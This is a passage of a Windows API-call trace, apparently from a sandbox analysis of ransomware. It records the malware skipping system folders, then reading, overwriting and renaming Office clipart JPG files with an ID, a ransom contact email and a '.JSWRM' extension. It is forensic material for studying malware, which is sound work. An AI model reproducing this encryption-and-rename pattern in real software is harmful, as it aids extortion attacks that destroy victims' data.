(lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148309.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148309.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0083.139] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=43674) returned 1 [0083.139] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xaa90) returned 0x24d210 [0083.140] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xaa90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xaa90, lpOverlapped=0x0) returned 1 [0083.182] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.182] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xaa90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xaa90, lpOverlapped=0x0) returned 1 [0083.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0083.183] CloseHandle (hObject=0x314) returned 1 [0083.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0083.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0083.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0083.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0083.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0083.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0083.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0083.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0083.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0083.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0083.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0083.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0083.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0083.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0083.184] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148309.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148309.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148309.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148309.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0083.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0083.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0083.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0083.185] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7cecf4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7cecf4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe84140d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x107d4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0148757.JPG", cAlternateFileName="")) returned 1 [0083.185] lstrcmpiW (lpString1="J0148757.JPG", lpString2=".") returned 1 [0083.185] lstrcmpiW (lpString1="J0148757.JPG", lpString2="..") returned 1 [0083.185] lstrcmpiW (lpString1="J0148757.JPG", lpString2="...") returned 1 [0083.185] lstrcmpiW (lpString1="J0148757.JPG", lpString2="windows") returned -1 [0083.185] lstrcmpiW (lpString1="J0148757.JPG", lpString2="recovery") returned -1 [0083.185] lstrcmpiW (lpString1="J0148757.JPG", lpString2="perflogs") returned -1 [0083.185] lstrcmpiW (lpString1="J0148757.JPG", lpString2="documents and settings") returned 1 [0083.185] lstrcmpiW (lpString1="J0148757.JPG", lpString2="$RECYCLE.BIN") returned 1 [0083.185] lstrcmpiW (lpString1="J0148757.JPG", lpString2="system volume information") returned -1 [0083.185] lstrcmpiW (lpString1="J0148757.JPG", lpString2="msocache") returned -1 [0083.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0083.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0148757.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0148757.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0148757.JPG", lpUsedDefaultChar=0x0) returned 12 [0083.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0083.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0083.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0148757.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0148757.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0148757.JPG", lpUsedDefaultChar=0x0) returned 12 [0083.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0083.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0083.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0083.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0083.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0083.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0083.185] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148757.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148757.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0083.186] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=67540) returned 1 [0083.186] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.186] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x107d0) returned 0x24d210 [0083.187] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x107d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x107d0, lpOverlapped=0x0) returned 1 [0083.194] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.194] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x107d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x107d0, lpOverlapped=0x0) returned 1 [0083.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0083.195] CloseHandle (hObject=0x314) returned 1 [0083.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0083.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0083.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0083.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0083.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0083.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0083.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0083.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0083.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0083.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0083.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0083.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0083.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0083.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0083.196] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148757.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148757.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148757.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148757.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0083.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0083.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0083.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0083.196] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7cecf4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7cecf4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe81b154, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x955d, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0148798.JPG", cAlternateFileName="")) returned 1 [0083.197] lstrcmpiW (lpString1="J0148798.JPG", lpString2=".") returned 1 [0083.197] lstrcmpiW (lpString1="J0148798.JPG", lpString2="..") returned 1 [0083.197] lstrcmpiW (lpString1="J0148798.JPG", lpString2="...") returned 1 [0083.197] lstrcmpiW (lpString1="J0148798.JPG", lpString2="windows") returned -1 [0083.197] lstrcmpiW (lpString1="J0148798.JPG", lpString2="recovery") returned -1 [0083.197] lstrcmpiW (lpString1="J0148798.JPG", lpString2="perflogs") returned -1 [0083.197] lstrcmpiW (lpString1="J0148798.JPG", lpString2="documents and settings") returned 1 [0083.197] lstrcmpiW (lpString1="J0148798.JPG", lpString2="$RECYCLE.BIN") returned 1 [0083.197] lstrcmpiW (lpString1="J0148798.JPG", lpString2="system volume information") returned -1 [0083.197] lstrcmpiW (lpString1="J0148798.JPG", lpString2="msocache") returned -1 [0083.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0083.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0148798.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0148798.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0148798.JPG", lpUsedDefaultChar=0x0) returned 12 [0083.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0083.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0083.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0148798.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0148798.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0148798.JPG", lpUsedDefaultChar=0x0) returned 12 [0083.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0083.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0083.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0083.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0083.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0083.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0083.197] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148798.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148798.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0083.198] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=38237) returned 1 [0083.198] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9550) returned 0x24d210 [0083.198] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x9550, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x9550, lpOverlapped=0x0) returned 1 [0083.203] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.203] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x9550, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x9550, lpOverlapped=0x0) returned 1 [0083.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0083.204] CloseHandle (hObject=0x314) returned 1 [0083.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0083.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0083.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0083.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0083.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0083.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0083.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0083.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0083.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0083.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0083.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0083.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0083.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0083.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0083.204] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148798.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148798.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0148798.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0148798.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0083.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0083.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0083.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0083.205] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7f4eef, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7f4eef, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe84140d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6b01, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0149018.JPG", cAlternateFileName="")) returned 1 [0083.205] lstrcmpiW (lpString1="J0149018.JPG", lpString2=".") returned 1 [0083.205] lstrcmpiW (lpString1="J0149018.JPG", lpString2="..") returned 1 [0083.205] lstrcmpiW (lpString1="J0149018.JPG", lpString2="...") returned 1 [0083.205] lstrcmpiW (lpString1="J0149018.JPG", lpString2="windows") returned -1 [0083.205] lstrcmpiW (lpString1="J0149018.JPG", lpString2="recovery") returned -1 [0083.205] lstrcmpiW (lpString1="J0149018.JPG", lpString2="perflogs") returned -1 [0083.205] lstrcmpiW (lpString1="J0149018.JPG", lpString2="documents and settings") returned 1 [0083.205] lstrcmpiW (lpString1="J0149018.JPG", lpString2="$RECYCLE.BIN") returned 1 [0083.205] lstrcmpiW (lpString1="J0149018.JPG", lpString2="system volume information") returned -1 [0083.205] lstrcmpiW (lpString1="J0149018.JPG", lpString2="msocache") returned -1 [0083.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0083.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0149018.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0149018.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0149018.JPG", lpUsedDefaultChar=0x0) returned 12 [0083.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0083.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0083.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0149018.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0149018.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0149018.JPG", lpUsedDefaultChar=0x0) returned 12 [0083.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0083.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0083.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0083.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0083.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0083.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0083.205] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149018.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0149018.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0083.206] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=27393) returned 1 [0083.206] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6b00) returned 0x24d210 [0083.206] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6b00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6b00, lpOverlapped=0x0) returned 1 [0083.210] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.210] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6b00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6b00, lpOverlapped=0x0) returned 1 [0083.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0083.211] CloseHandle (hObject=0x314) returned 1 [0083.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0083.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0083.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0083.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0083.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 